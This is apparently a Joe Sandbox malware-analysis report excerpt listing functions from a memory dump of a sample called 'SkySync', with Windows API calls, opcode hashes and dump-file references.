Part of subcall function 00AB359C: EncodePointer.KERNEL32(?,?,00AA6004,00AE8892), ref: 00AB35B9

Part of subcall function 00AA5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AA5F18
Part of subcall function 00AA5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA5F2D

Part of subcall function 00AA5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA526C
Part of subcall function 00AA5240: IsDebuggerPresent.KERNEL32 ref: 00AA527E
Part of subcall function 00AA5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00AA52E6
Part of subcall function 00AA5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00AA5366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00AA602F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme
String ID:
API String ID: 1658450864-0
Opcode ID: 1fa74375d9d6e29e598c8d94b922d903c99dd9814dba6ccc58d4f1bd04aa038c
Instruction ID: 31ab758ff3a3e8bc496f8ebcacc1f794bf8a3041b7c0f83bde13137ff411ae68
Opcode Fuzzy Hash: 1fa74375d9d6e29e598c8d94b922d903c99dd9814dba6ccc58d4f1bd04aa038c
Instruction Fuzzy Hash: 65119D71A083019FC710EF69ED45A4ABBE8EF89711F00895EF445972B2DFB09945CF92

Function 00AF6FDA Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,00AF710A,00000000,00000000,00AD2F49), ref: 00AF6FFF
InterlockedExchange.KERNEL32(00000034,00000000), ref: 00AF7021

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 0b86ef3f3bef0c89fc7719457f5d43c88637aaaa0bffa0bf933f3087b5539d29
Instruction ID: 7763e242ac30d1aa5cb7d0e207945d2adf6a00fa85814dfea2426fb127ae9333
Opcode Fuzzy Hash: 0b86ef3f3bef0c89fc7719457f5d43c88637aaaa0bffa0bf933f3087b5539d29
Instruction Fuzzy Hash: 41F0D4B11107059FD320EF56E9489A7FBECEF89710B40882EE58A87A11DBB4A445CB61

Function 00AB2F85 Relevance: 3.0, APIs: 2, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00AB9C54,00000000,00AB8D5D,00AB59C3,?), ref: 00AB2F99
GetLastError.KERNEL32(00000000,?,00AB9C54,00000000,00AB8D5D,00AB59C3,?), ref: 00AB2FAB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: b91194169e4c013d3b1a2440dc7af6c25aa6489763c06e64c0027955d9b037af
Instruction ID: e36dbe81f2f1f11f5905493b955aa59b02b749e49a7b88339319b6c9e473551b
Opcode Fuzzy Hash: b91194169e4c013d3b1a2440dc7af6c25aa6489763c06e64c0027955d9b037af
Instruction Fuzzy Hash: E3E01231104609ABDB213FB4ED0DBE97BACAF14792F544426FA08970B2DF3984A1CB94

Function 00AC0D0D Relevance: 2.6, APIs: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00B20994,00000000,?,00AC8449,00B20994,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC0D5D
GetLastError.KERNEL32(?,00AC8449,00B20994,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC0D67

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 30b6c35e952c9a64f2ebe565de0eefc4a060cd5f7bc7563ff7922ff6e46e4268
Instruction ID: 6a346940ed2fcaf472db7a3f7d94912342709e6b95e07d8e515c2d6d5f242208
Opcode Fuzzy Hash: 30b6c35e952c9a64f2ebe565de0eefc4a060cd5f7bc7563ff7922ff6e46e4268
Instruction Fuzzy Hash: 21018E32511960DBC72223FCA959FFD2B5C8B41B70F1A060DF81A871D3EEA0A8808180

Function 00B0C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 1eca14d6f46aa0ccb45f2ae8e0bb1d504c665aa070eb1c0c5e1ab5723aa2d338
Instruction ID: 20cf899e606cecdab2006332093d8ee1e1d4665518bd155cd4cefcdd317fdd36
Opcode Fuzzy Hash: 1eca14d6f46aa0ccb45f2ae8e0bb1d504c665aa070eb1c0c5e1ab5723aa2d338
Instruction Fuzzy Hash: 6AB15D35A0010AEFCF14DF94D891DEEBBB5FF58710F10815AF916AB291EB71A941CB90

Function 00AB5AF0 Relevance: 1.8, APIs: 1, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeccea2d624be2d9c18569de691f29aae040c0baad290e63d38865e17a6b41dc
Instruction ID: 38e15dfab7ea7d48fab1f4e985959b07aaf24f8496f3fb3f1ab97981c85db713
Opcode Fuzzy Hash: eeccea2d624be2d9c18569de691f29aae040c0baad290e63d38865e17a6b41dc
Instruction Fuzzy Hash: 16A1A071E006989BDB31CF28C984BE8B7BAAB09354F1842D9D48897253D7B5EEC1CF50

Function 00ACE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00ACE2EA

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 05320414c8eb45223ce6978e6ec6d9c1d86a409fa15c3a68d63056bbb3f1da8d
Instruction ID: 82aeaecf65092ebcd4721e5924265b6b528e12d9b0a4ec676d6ffd249e8b7cef
Opcode Fuzzy Hash: 05320414c8eb45223ce6978e6ec6d9c1d86a409fa15c3a68d63056bbb3f1da8d
Instruction Fuzzy Hash: 04410674608351CFDB24DF14C594B1ABBE1BF45308F1989ACE8899B362C371EC85CB92

Function 00AB7E83 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00ABA038: GetStartupInfoW.KERNEL32(?), ref: 00ABA042

GetCommandLineW.KERNEL32(00B4CD38,00000014), ref: 00AB7F23

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CommandInfoLineStartup
String ID:
API String ID: 582193876-0
Opcode ID: 591a9a6dbb4f5e74117fb77b4dbf59b4d5488da9ea73cbd7c3165d04cf55b1ae
Instruction ID: 04ccc3d3719307a27e89a2aa5b6e61669761bd374a3343e5497027e9ef47cb6c
Opcode Fuzzy Hash: 591a9a6dbb4f5e74117fb77b4dbf59b4d5488da9ea73cbd7c3165d04cf55b1ae
Instruction Fuzzy Hash: 1221F421A083119EEB20B7B49A43FFE26AC5F90751F1004AAF6049A1C3DFF4CD40D269

Function 00AA49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00AA4B63

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00AA27AF,?,00000001), ref: 00AA49F4

Part of subcall function 00AA4ADE: FreeLibrary.KERNEL32(00000000), ref: 00AA4B18

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 441e4e4ce7d0e20d49f96c4b7f6550df07be52f5b3fb3abae53d1382e087a6f4
Instruction ID: 3873ea330c1ed151c146558ecd97dfcfa35e711c7c0a5f43df6b49a00538c8f2
Opcode Fuzzy Hash: 441e4e4ce7d0e20d49f96c4b7f6550df07be52f5b3fb3abae53d1382e087a6f4
Instruction Fuzzy Hash: 48113A31650209ABCB10FB70CD02FAE73A99F89741F10842DF541A71D2EFF08E01AB94

Function 00ACE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00ACE3CE

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 957033066e6482c4ccf25a73dfeeedc966a6b270a9a1dea4a2abbf85a332bd22
Instruction ID: bbd52d1a800b4bcd707594dc306b55331b82f479bb67b717c15898326c1a0cc9
Opcode Fuzzy Hash: 957033066e6482c4ccf25a73dfeeedc966a6b270a9a1dea4a2abbf85a332bd22
Instruction Fuzzy Hash: F821DEB4A08341DFDB24EF24C594B5ABBE5BF84304F05896CE88A57362D731E849CB92

Function 00AB593C Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(01020000,00000000,00000001,?,?,?,?,00AB1003,?,0000FFFF), ref: 00AB597F

Part of subcall function 00ABA3F8: GetModuleFileNameW.KERNEL32(00000000,00B553BA,00000104,?,00000001,00AB1003), ref: 00ABA48A

Part of subcall function 00AB32CF: ExitProcess.KERNEL32 ref: 00AB32DE

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AllocateExitFileHeapModuleNameProcess
String ID:
API String ID: 1715456479-0
Opcode ID: 26315b01825cceda513d026dbe7f9f40599fbd6a3a1ad918923863402de81179
Instruction ID: adc6997e441a5dc2e6f3e2961408d94f1090d9bcc41cfac9cc24010a93b091ea
Opcode Fuzzy Hash: 26315b01825cceda513d026dbe7f9f40599fbd6a3a1ad918923863402de81179
Instruction Fuzzy Hash: 0901F136701B02DBEA262B389D12BEE339C8F52771F500527F515AB1E3DE748D008761

Function 00AC5426 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AB8A19,00AB1003,?,00000000,00000000,00000000,?,00AB9C1C,00000001,000003BC,00AB1003,00AB8D5D), ref: 00AC5465

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d43fffad4ff62edfa9a138097624aec93a34fb5d52a11a3cd91a88918fe7c516
Instruction ID: 5a95dc7dbfa9a468f61d316e8658b5b6fcb9319b43de8a11438f023afb4ffc3f
Opcode Fuzzy Hash: d43fffad4ff62edfa9a138097624aec93a34fb5d52a11a3cd91a88918fe7c516
Instruction Fuzzy Hash: 2501B131A01A259BDF2D9F358A01FAA339AAB00762F06811DF816DB190DB30ECC08790

Function 00AA4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00AA27AF,?,00000001), ref: 00AA4A63

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3d1c2f13b7ce72f125f464dd3f651f798c1c644c9ee7afc5619624052a7014dd
Instruction ID: 74167e23eb92453428d7458567f3ba1be67fd85a9a53ed4bb2c7c7b22c90e9a6
Opcode Fuzzy Hash: 3d1c2f13b7ce72f125f464dd3f651f798c1c644c9ee7afc5619624052a7014dd
Instruction Fuzzy Hash: 73F01571145701CFCB349F64E490816BBF4AF5A3663208A2EF1D683651C7B29984DB44

Function 00AA5AC3 Relevance: 1.5, APIs: 1, Instructions: 25windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AA5B1F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: c2154f6db5211679f0ff9c8f47ec26a1244126af13aec6986f919e58dac7ee3e
Instruction ID: 0a89d6377d823b0a333d4a7ffb9c3386369d79de990d2b5e650297a02cdb71f7
Opcode Fuzzy Hash: c2154f6db5211679f0ff9c8f47ec26a1244126af13aec6986f919e58dac7ee3e
Instruction Fuzzy Hash: A3F0A7719183089FD7A2DB24EC467D577BC9701308F0001E9FA4897296DF724B88CF55

Function 00AB09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB09E4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 8496deddb98c6bed95b307dfb2436c429bce768edb20ba9d07511b48fb214ec5
Instruction ID: 223535170e26419d7738f24934c94b1f02abaa885221d37b347ace9bc4eb44f2
Opcode Fuzzy Hash: 8496deddb98c6bed95b307dfb2436c429bce768edb20ba9d07511b48fb214ec5
Instruction Fuzzy Hash: 44E08632A0012857C721E6989C05FEA77DDDF8D690F0501B6FC08D7245D9649C8186D1

Function 00AF4D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00AF4D31

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 5945518b8eaeb1b705dc3f7acbd27424bdfb420a84f8e4768e41e16bdfbd276c
Instruction ID: aa953d9514b2832288254381af0cd70f8507cab2df0073e66d531c351f4bc12f
Opcode Fuzzy Hash: 5945518b8eaeb1b705dc3f7acbd27424bdfb420a84f8e4768e41e16bdfbd276c
Instruction Fuzzy Hash: 34D05EA191032C3BDB60F6A49C0DDB77BACE744220F0006A17C6CC3242ED28AD4586E0

Function 00AF77C2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000677A8,00000000,00000000,?), ref: 00AF77DD

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 3c923ac3c93877c39dc740d9289e698a62fe09888d65279ec1f109671f89de03
Instruction ID: 2fcaaa24f7bc1c490914c23b3bf7f57faf8e67e34870eeb4bdd231c3081b8dcc
Opcode Fuzzy Hash: 3c923ac3c93877c39dc740d9289e698a62fe09888d65279ec1f109671f89de03
Instruction Fuzzy Hash: 9ED012714383187F66289BA4DC46C77B69CE905222340076EB90592500E6A1BC1086A0

Function 00AB32CF Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

Part of subcall function 00AB329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00AB32DA,00AB1003,?,00AB9EEE,000000FF,0000001E,00B4CE28,00000008,00AB9E52,00AB1003,00AB1003), ref: 00AB32AA
Part of subcall function 00AB329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00AB32BC

ExitProcess.KERNEL32 ref: 00AB32DE

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID:
API String ID: 75539706-0
Opcode ID: 8f7d2b997857c2e69c0e88c6e69def40208d9231d7a5e524ceac66899aa83ea4
Instruction ID: ac8ef7c98fb62ca18fc62550aeb5a8eab287e22633cd8b26cca8f0d9b505ff80
Opcode Fuzzy Hash: 8f7d2b997857c2e69c0e88c6e69def40208d9231d7a5e524ceac66899aa83ea4
Instruction Fuzzy Hash: D4B09231000208BBCF013F11DC0A8883F29FB08A90B004120F80509032DF72AA929A88

Non-executed Functions

Function 00AB33B7 Relevance: 120.9, APIs: 35, Strings: 34, Instructions: 193libraryloaderCOMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000), ref: 00AB33BA

Part of subcall function 00ABA754: EncodePointer.KERNEL32(00ABA720,00B4CE68,00000008,00AC4D3C), ref: 00ABA759

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00ABA0D0
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00ABA0E4
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00ABA0F7
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00ABA10A
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00ABA11D
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00ABA130
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00ABA143
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00ABA156
GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00ABA169
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00ABA17C
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00ABA18F
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00ABA1A2
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00ABA1B5
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00ABA1C8
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00ABA1DB
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00ABA1EE
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00ABA201
